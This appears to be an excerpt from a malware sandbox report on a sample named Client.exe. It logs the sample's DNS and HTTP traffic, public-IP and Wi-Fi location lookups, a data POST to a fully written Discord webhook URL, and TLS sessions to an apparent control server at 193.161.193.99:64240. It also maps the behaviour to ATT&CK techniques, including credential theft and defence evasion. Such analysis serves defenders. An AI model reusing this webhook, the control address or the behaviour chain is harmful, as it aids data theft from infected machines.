                                                                                                  227.187.250.142.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  227.187.250.142.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                  227.187.250.142.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  lhr25s34-in-f31e100net
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  195.187.250.142.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  195.187.250.142.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                  195.187.250.142.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  lhr25s33-in-f31e100net
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  14.179.89.13.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  14.179.89.13.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  icanhazip.com
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  icanhazip.com
                                                                                                  IN A
                                                                                                  Response
                                                                                                  icanhazip.com
                                                                                                  IN A
                                                                                                  104.16.185.241
                                                                                                  icanhazip.com
                                                                                                  IN A
                                                                                                  104.16.184.241
                                                                                                • flag-us
                                                                                                  GET
                                                                                                  http://icanhazip.com/
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  104.16.185.241:80
                                                                                                  Request
                                                                                                  GET / HTTP/1.1
                                                                                                  Host: icanhazip.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Response
                                                                                                  HTTP/1.1 200 OK
                                                                                                  Date: Fri, 10 Jan 2025 15:18:40 GMT
                                                                                                  Content-Type: text/plain
                                                                                                  Content-Length: 15
                                                                                                  Connection: keep-alive
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: GET
                                                                                                  Set-Cookie: __cf_bm=98VLGPOMoeHa7qd5n.Q7qNbcdGTfs2zOyzmmVibNsEo-1736522320-1.0.1.1-9W3i._1Z46rJFDeDwaJQG.yMSayGQ6wevWC38EG2X0qRuZwSl0VvWvsoatJpMmreYWnXZ4Z0cvMmZ_4tOmcCXg; path=/; expires=Fri, 10-Jan-25 15:48:40 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ffda417d842ef31-LHR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                • flag-us
                                                                                                  GET
                                                                                                  http://icanhazip.com/
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  104.16.185.241:80
                                                                                                  Request
                                                                                                  GET / HTTP/1.1
                                                                                                  Host: icanhazip.com
                                                                                                  Response
                                                                                                  HTTP/1.1 200 OK
                                                                                                  Date: Fri, 10 Jan 2025 15:18:43 GMT
                                                                                                  Content-Type: text/plain
                                                                                                  Content-Length: 15
                                                                                                  Connection: keep-alive
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Methods: GET
                                                                                                  Set-Cookie: __cf_bm=DEm2ts2LtRoK5I6kF948JUdAyChzfxwV.okxyp0Xjgo-1736522323-1.0.1.1-Xo5KvnUwS70VvFJXDQ2_ayjOjx0dKyuiuWy0Mym.GJHZffmOPJh9wV6RZjug421Ub18xxx3SmH1LxAYxpH6uOQ; path=/; expires=Fri, 10-Jan-25 15:48:43 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ffda428ddc0ef31-LHR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  ip-api.com
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  ip-api.com
                                                                                                  IN A
                                                                                                  Response
                                                                                                  ip-api.com
                                                                                                  IN A
                                                                                                  208.95.112.1
                                                                                                • flag-us
                                                                                                  GET
                                                                                                  http://ip-api.com/line/?fields=hosting
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  208.95.112.1:80
                                                                                                  Request
                                                                                                  GET /line/?fields=hosting HTTP/1.1
                                                                                                  Host: ip-api.com
                                                                                                  Connection: Keep-Alive
                                                                                                  Response
                                                                                                  HTTP/1.1 200 OK
                                                                                                  Date: Fri, 10 Jan 2025 15:18:41 GMT
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  Content-Length: 6
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  X-Ttl: 60
                                                                                                  X-Rl: 44
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  241.185.16.104.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  241.185.16.104.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  1.112.95.208.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  1.112.95.208.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                  1.112.95.208.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  ip-apicom
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  api.mylnikov.org
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  api.mylnikov.org
                                                                                                  IN A
                                                                                                  Response
                                                                                                  api.mylnikov.org
                                                                                                  IN A
                                                                                                  104.21.44.66
                                                                                                  api.mylnikov.org
                                                                                                  IN A
                                                                                                  172.67.196.114
                                                                                                • flag-us
                                                                                                  GET
                                                                                                  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  104.21.44.66:443
                                                                                                  Request
                                                                                                  GET /geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b HTTP/1.1
                                                                                                  Host: api.mylnikov.org
                                                                                                  Connection: Keep-Alive
                                                                                                  Response
                                                                                                  HTTP/1.1 200 OK
                                                                                                  Date: Fri, 10 Jan 2025 15:18:43 GMT
                                                                                                  Content-Type: application/json; charset=utf8
                                                                                                  Content-Length: 88
                                                                                                  Connection: keep-alive
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Cache-Control: max-age=2678400
                                                                                                  CF-Cache-Status: MISS
                                                                                                  Last-Modified: Fri, 10 Jan 2025 15:18:43 GMT
                                                                                                  Accept-Ranges: bytes
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mc8%2FjqHyR%2FGRYXMWeBPwCtvJjbkzoorDZRfPtt09pyjSwRMFt5P7rHIHMaIIfr%2BaorvByVLgvD8IwinFYrjE8MutQ3XkIsXGZRFPJmq3c988r%2FjdUIl2keT4oczR0bnx7HIM"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Strict-Transport-Security: max-age=0; preload
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ffda429ea379469-LHR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=26818&min_rtt=26397&rtt_var=6239&sent=6&recv=6&lost=0&retrans=0&sent_bytes=2989&recv_bytes=412&delivery_rate=141550&cwnd=252&unsent_bytes=0&cid=1dd36f9f47291c7d&ts=291&x=0"
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  66.44.21.104.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  66.44.21.104.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  66.44.21.104.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  66.44.21.104.in-addr.arpa
                                                                                                  IN PTR
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  discord.com
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  discord.com
                                                                                                  IN A
                                                                                                  Response
                                                                                                  discord.com
                                                                                                  IN A
                                                                                                  162.159.128.233
                                                                                                  discord.com
                                                                                                  IN A
                                                                                                  162.159.136.232
                                                                                                  discord.com
                                                                                                  IN A
                                                                                                  162.159.137.232
                                                                                                  discord.com
                                                                                                  IN A
                                                                                                  162.159.135.232
                                                                                                  discord.com
                                                                                                  IN A
                                                                                                  162.159.138.232
                                                                                                • flag-us
                                                                                                  POST
                                                                                                  https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true
                                                                                                  Client.exe
                                                                                                  Remote address:
                                                                                                  162.159.128.233:443
                                                                                                  Request
                                                                                                  POST /api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true HTTP/1.1
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Host: discord.com
                                                                                                  Content-Length: 2200
                                                                                                  Expect: 100-continue
                                                                                                  Connection: Keep-Alive
                                                                                                  Response
                                                                                                  HTTP/1.1 404 Not Found
                                                                                                  Date: Fri, 10 Jan 2025 15:18:46 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 45
                                                                                                  Connection: keep-alive
                                                                                                  Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                  x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                  x-ratelimit-limit: 5
                                                                                                  x-ratelimit-remaining: 4
                                                                                                  x-ratelimit-reset: 1736522327
                                                                                                  x-ratelimit-reset-after: 1
                                                                                                  via: 1.1 google
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6pcT4vqhxHtTgsz1wGB%2Fx%2BbMrvBsfCPcFr0mnJITcO5i4faqtQd3McrR2QjHySDc%2Bt%2BFB7X0Kz4RPXR3iDLifNJssdP4D1%2FaGYykQ%2BcQnEV%2BgwI%2BcotJfMPVTimW"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Set-Cookie: __cfruid=e3f41ac47c5129c6b21bf3a7d54d1f197d458979-1736522326; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                  Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                  Set-Cookie: _cfuvid=BlCNHWOODE45kITlHyhoSKVTy9DvmI.IXkBqxjybPOM-1736522326154-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ffda4399b8e944e-LHR
                                                                                                • flag-us
                                                                                                  DNS
                                                                                                  233.128.159.162.in-addr.arpa
                                                                                                  Remote address:
                                                                                                  8.8.8.8:53
                                                                                                  Request
                                                                                                  233.128.159.162.in-addr.arpa
                                                                                                  IN PTR
                                                                                                  Response
                                                                                                • 127.0.0.1:4449
                                                                                                  Client.exe
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  33.2kB
                                                                                                   303.2kB
                                                                                                   309
                                                                                                  389
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  7.7kB
                                                                                                   1.3kB
                                                                                                   21
                                                                                                  17
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  708.1kB
                                                                                                   208.1kB
                                                                                                   900
                                                                                                  689
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  3.0kB
                                                                                                   1.1kB
                                                                                                   24
                                                                                                  22
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  456 B
                                                                                                   361 B
                                                                                                   6
                                                                                                  5
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  508 B
                                                                                                   361 B
                                                                                                   7
                                                                                                  5
                                                                                                • 142.250.187.196:443
                                                                                                  https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGIbyhLwGIjC0HOxmfUNgMHzKZ07tC5p1mghTr4Ylzf0ka5zBQuY_mu6QzDQjKljPjXZhUzTx2vQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                  tls, http2
                                                                                                  msedge.exe
                                                                                                  2.5kB
                                                                                                   11.3kB
                                                                                                   19
                                                                                                  24

                                                                                                  HTTP Request

                                                                                                  GET https://www.google.com/

                                                                                                  HTTP Request

                                                                                                  GET https://www.google.com/sorry/index?continue=https://www.google.com/&q=EgS117BTGIbyhLwGIjC0HOxmfUNgMHzKZ07tC5p1mghTr4Ylzf0ka5zBQuY_mu6QzDQjKljPjXZhUzTx2vQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

                                                                                                  HTTP Response

                                                                                                  429
                                                                                                • 127.0.0.1:4449
                                                                                                  Client.exe
                                                                                                • 127.0.0.1:4449
                                                                                                  Client.exe
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  74.5kB
                                                                                                   2.0MB
                                                                                                   1095
                                                                                                  1610
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  11.7kB
                                                                                                   2.2kB
                                                                                                   28
                                                                                                  25
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  3.6kB
                                                                                                   361 B
                                                                                                   10
                                                                                                  5
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  16.7kB
                                                                                                   1.3kB
                                                                                                   40
                                                                                                  28
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  94.8kB
                                                                                                   2.2kB
                                                                                                   75
                                                                                                  45
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  1.5kB
                                                                                                   361 B
                                                                                                   8
                                                                                                  5
                                                                                                • 104.16.185.241:80
                                                                                                  http://icanhazip.com/
                                                                                                  http
                                                                                                  Client.exe
                                                                                                  464 B
                                                                                                   1.3kB
                                                                                                   8
                                                                                                  5

                                                                                                  HTTP Request

                                                                                                  GET http://icanhazip.com/

                                                                                                  HTTP Response

                                                                                                  200

                                                                                                  HTTP Request

                                                                                                  GET http://icanhazip.com/

                                                                                                  HTTP Response

                                                                                                  200
                                                                                                • 208.95.112.1:80
                                                                                                  http://ip-api.com/line/?fields=hosting
                                                                                                  http
                                                                                                  Client.exe
                                                                                                  310 B
                                                                                                   347 B
                                                                                                   5
                                                                                                  4

                                                                                                  HTTP Request

                                                                                                  GET http://ip-api.com/line/?fields=hosting

                                                                                                  HTTP Response

                                                                                                  200
                                                                                                • 104.21.44.66:443
                                                                                                  https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b
                                                                                                  tls, http
                                                                                                  Client.exe
                                                                                                  814 B
                                                                                                   4.5kB
                                                                                                   9
                                                                                                  9

                                                                                                  HTTP Request

                                                                                                  GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=6a:27:bf:6a:69:8b

                                                                                                  HTTP Response

                                                                                                  200
                                                                                                • 162.159.128.233:443
                                                                                                  https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true
                                                                                                  tls, http
                                                                                                  Client.exe
                                                                                                  3.3kB
                                                                                                   4.8kB
                                                                                                   11
                                                                                                  10

                                                                                                  HTTP Request

                                                                                                  POST https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5Xnk3vl2YBdVD37L0qTWnM?wait=true

                                                                                                  HTTP Response

                                                                                                  404
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  2.6kB
                                                                                                   790 B
                                                                                                   20
                                                                                                  12
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  508 B
                                                                                                   321 B
                                                                                                   7
                                                                                                  4
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  502 B
                                                                                                   401 B
                                                                                                   7
                                                                                                  6
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  456 B
                                                                                                   361 B
                                                                                                   6
                                                                                                  5
                                                                                                • 127.0.0.1:4449
                                                                                                  Client.exe
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  14.5kB
                                                                                                   339.0kB
                                                                                                   214
                                                                                                  260
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  410 B
                                                                                                   241 B
                                                                                                   5
                                                                                                  2
                                                                                                • 193.161.193.99:64240
                                                                                                  tls
                                                                                                  Client.exe
                                                                                                  456 B
                                                                                                   321 B
                                                                                                   6
                                                                                                  4
                                                                                                • 8.8.8.8:53
                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                  dns
                                                                                                  66 B
                                                                                                   90 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  8.8.8.8.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  104.219.191.52.in-addr.arpa
                                                                                                  dns
                                                                                                  73 B
                                                                                                   147 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  104.219.191.52.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  172.210.232.199.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                   128 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  172.210.232.199.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  72.32.126.40.in-addr.arpa
                                                                                                  dns
                                                                                                  71 B
                                                                                                   157 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  72.32.126.40.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  95.221.229.192.in-addr.arpa
                                                                                                  dns
                                                                                                  73 B
                                                                                                   144 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  95.221.229.192.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  99.193.161.193.in-addr.arpa
                                                                                                  dns
                                                                                                  73 B
                                                                                                   131 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  99.193.161.193.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  58.55.71.13.in-addr.arpa
                                                                                                  dns
                                                                                                  70 B
                                                                                                   144 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  58.55.71.13.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  154.239.44.20.in-addr.arpa
                                                                                                  dns
                                                                                                  72 B
                                                                                                   158 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  154.239.44.20.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  200.163.202.172.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                   160 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  200.163.202.172.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  171.39.242.20.in-addr.arpa
                                                                                                  dns
                                                                                                  72 B
                                                                                                   158 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  171.39.242.20.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  60.153.16.2.in-addr.arpa
                                                                                                  dns
                                                                                                  70 B
                                                                                                   133 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  60.153.16.2.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  11.227.111.52.in-addr.arpa
                                                                                                  dns
                                                                                                  72 B
                                                                                                   158 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  11.227.111.52.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  google.com
                                                                                                  dns
                                                                                                  PING.EXE
                                                                                                  56 B
                                                                                                   72 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  google.com

                                                                                                  DNS Response

                                                                                                  142.250.180.14

                                                                                                • 8.8.8.8:53
                                                                                                  www.google.com
                                                                                                  dns
                                                                                                  msedge.exe
                                                                                                  60 B
                                                                                                   76 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  www.google.com

                                                                                                  DNS Response

                                                                                                  142.250.187.196

                                                                                                • 8.8.8.8:53
                                                                                                  196.187.250.142.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                   112 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  196.187.250.142.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  134.32.126.40.in-addr.arpa
                                                                                                  dns
                                                                                                  72 B
                                                                                                   158 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  134.32.126.40.in-addr.arpa

                                                                                                • 142.250.187.196:443
                                                                                                  www.google.com
                                                                                                  https
                                                                                                  msedge.exe
                                                                                                  16.4kB
                                                                                                   111.6kB
                                                                                                   72
                                                                                                  109
                                                                                                • 8.8.8.8:53
                                                                                                  227.187.250.142.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                   112 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  227.187.250.142.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  195.187.250.142.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                   112 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  195.187.250.142.in-addr.arpa

                                                                                                • 224.0.0.251:5353
                                                                                                  531 B
                                                                                                   8
                                                                                                • 8.8.8.8:53
                                                                                                  14.179.89.13.in-addr.arpa
                                                                                                  dns
                                                                                                  71 B
                                                                                                   145 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  14.179.89.13.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  icanhazip.com
                                                                                                  dns
                                                                                                  Client.exe
                                                                                                  59 B
                                                                                                   91 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  icanhazip.com

                                                                                                  DNS Response

                                                                                                  104.16.185.241
                                                                                                  104.16.184.241

                                                                                                • 8.8.8.8:53
                                                                                                  ip-api.com
                                                                                                  dns
                                                                                                  Client.exe
                                                                                                  56 B
                                                                                                   72 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  ip-api.com

                                                                                                  DNS Response

                                                                                                  208.95.112.1

                                                                                                • 8.8.8.8:53
                                                                                                  241.185.16.104.in-addr.arpa
                                                                                                  dns
                                                                                                  73 B
                                                                                                   135 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  241.185.16.104.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  1.112.95.208.in-addr.arpa
                                                                                                  dns
                                                                                                  71 B
                                                                                                   95 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  1.112.95.208.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  api.mylnikov.org
                                                                                                  dns
                                                                                                  Client.exe
                                                                                                  62 B
                                                                                                   94 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  api.mylnikov.org

                                                                                                  DNS Response

                                                                                                  104.21.44.66
                                                                                                  172.67.196.114

                                                                                                • 8.8.8.8:53
                                                                                                  66.44.21.104.in-addr.arpa
                                                                                                  dns
                                                                                                  142 B
                                                                                                   133 B
                                                                                                   2
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  66.44.21.104.in-addr.arpa

                                                                                                  DNS Request

                                                                                                  66.44.21.104.in-addr.arpa

                                                                                                • 8.8.8.8:53
                                                                                                  discord.com
                                                                                                  dns
                                                                                                  Client.exe
                                                                                                  57 B
                                                                                                   137 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  discord.com

                                                                                                  DNS Response

                                                                                                  162.159.128.233
                                                                                                  162.159.136.232
                                                                                                  162.159.137.232
                                                                                                  162.159.135.232
                                                                                                  162.159.138.232

                                                                                                • 8.8.8.8:53
                                                                                                  233.128.159.162.in-addr.arpa
                                                                                                  dns
                                                                                                  74 B
                                                                                                   136 B
                                                                                                   1
                                                                                                  1

                                                                                                  DNS Request

                                                                                                  233.128.159.162.in-addr.arpa

                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                Reconnaissance

                                                                                                Resource Development

                                                                                                Initial Access

                                                                                                Execution

                                                                                                Command and Scripting Interpreter

                                                                                                2
                                                                                                T1059

                                                                                                PowerShell

                                                                                                1
                                                                                                T1059.001

                                                                                                Persistence

                                                                                                Account Manipulation

                                                                                                1
                                                                                                T1098

                                                                                                Boot or Logon Autostart Execution

                                                                                                1
                                                                                                T1547

                                                                                                Active Setup

                                                                                                1
                                                                                                T1547.014

                                                                                                Create or Modify System Process

                                                                                                2
                                                                                                T1543

                                                                                                Windows Service

                                                                                                2
                                                                                                T1543.003

                                                                                                Event Triggered Execution

                                                                                                1
                                                                                                T1546

                                                                                                Netsh Helper DLL

                                                                                                1
                                                                                                T1546.007

                                                                                                Privilege Escalation

                                                                                                Abuse Elevation Control Mechanism

                                                                                                1
                                                                                                T1548

                                                                                                Bypass User Account Control

                                                                                                1
                                                                                                T1548.002

                                                                                                Account Manipulation

                                                                                                1
                                                                                                T1098

                                                                                                Boot or Logon Autostart Execution

                                                                                                1
                                                                                                T1547

                                                                                                Active Setup

                                                                                                1
                                                                                                T1547.014

                                                                                                Create or Modify System Process

                                                                                                2
                                                                                                T1543

                                                                                                Windows Service

                                                                                                2
                                                                                                T1543.003

                                                                                                Event Triggered Execution

                                                                                                1
                                                                                                T1546

                                                                                                Netsh Helper DLL

                                                                                                1
                                                                                                T1546.007

                                                                                                Defense Evasion

                                                                                                Abuse Elevation Control Mechanism

                                                                                                1
                                                                                                T1548

                                                                                                Bypass User Account Control

                                                                                                1
                                                                                                T1548.002

                                                                                                Impair Defenses

                                                                                                3
                                                                                                T1562

                                                                                                Disable or Modify System Firewall

                                                                                                1
                                                                                                T1562.004

                                                                                                Disable or Modify Tools

                                                                                                2
                                                                                                T1562.001

                                                                                                Modify Registry

                                                                                                5
                                                                                                T1112

                                                                                                Credential Access

                                                                                                Credentials from Password Stores

                                                                                                1
                                                                                                T1555

                                                                                                Credentials from Web Browsers

                                                                                                1
                                                                                                T1555.003

                                                                                                Unsecured Credentials

                                                                                                1
                                                                                                T1552

                                                                                                Credentials In Files

                                                                                                1
                                                                                                T1552.001

                                                                                                Discovery

                                                                                                Browser Information Discovery

                                                                                                1
                                                                                                T1217

                                                                                                Network Service Discovery

                                                                                                1
                                                                                                T1046

                                                                                                Peripheral Device Discovery

                                                                                                2
                                                                                                T1120

                                                                                                Permission Groups Discovery

                                                                                                1
                                                                                                T1069

                                                                                                Local Groups

                                                                                                1
                                                                                                T1069.001

                                                                                                Process Discovery

                                                                                                1
                                                                                                T1057

                                                                                                Query Registry

                                                                                                7
                                                                                                T1012

                                                                                                Remote System Discovery

                                                                                                1
                                                                                                T1018

                                                                                                System Information Discovery

                                                                                                9
                                                                                                T1082

                                                                                                System Location Discovery

                                                                                                1
                                                                                                T1614

                                                                                                System Language Discovery

                                                                                                1
                                                                                                T1614.001

                                                                                                System Network Configuration Discovery

                                                                                                2
                                                                                                T1016

                                                                                                Internet Connection Discovery

                                                                                                1
                                                                                                T1016.001

                                                                                                Wi-Fi Discovery

                                                                                                1
                                                                                                T1016.002

                                                                                                System Network Connections Discovery

                                                                                                1
                                                                                                T1049

                                                                                                Lateral Movement

                                                                                                Collection

                                                                                                Data from Local System

                                                                                                2
                                                                                                T1005

                                                                                                Email Collection

                                                                                                1
                                                                                                T1114

                                                                                                Command and Control

                                                                                                Web Service

                                                                                                1
                                                                                                T1102

                                                                                                Exfiltration

                                                                                                Impact

                                                                                                Replay Monitor

                                                                                                Loading Replay Monitor...

                                                                                                Downloads

                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Client.exe.log
                                                                                                  Filesize

                                                                                                  1KB

                                                                                                  MD5

                                                                                                  baf55b95da4a601229647f25dad12878

                                                                                                  SHA1

                                                                                                  abc16954ebfd213733c4493fc1910164d825cac8

                                                                                                  SHA256

                                                                                                  ee954c5d8156fd8890e582c716e5758ed9b33721258f10e758bdc31ccbcb1924

                                                                                                  SHA512

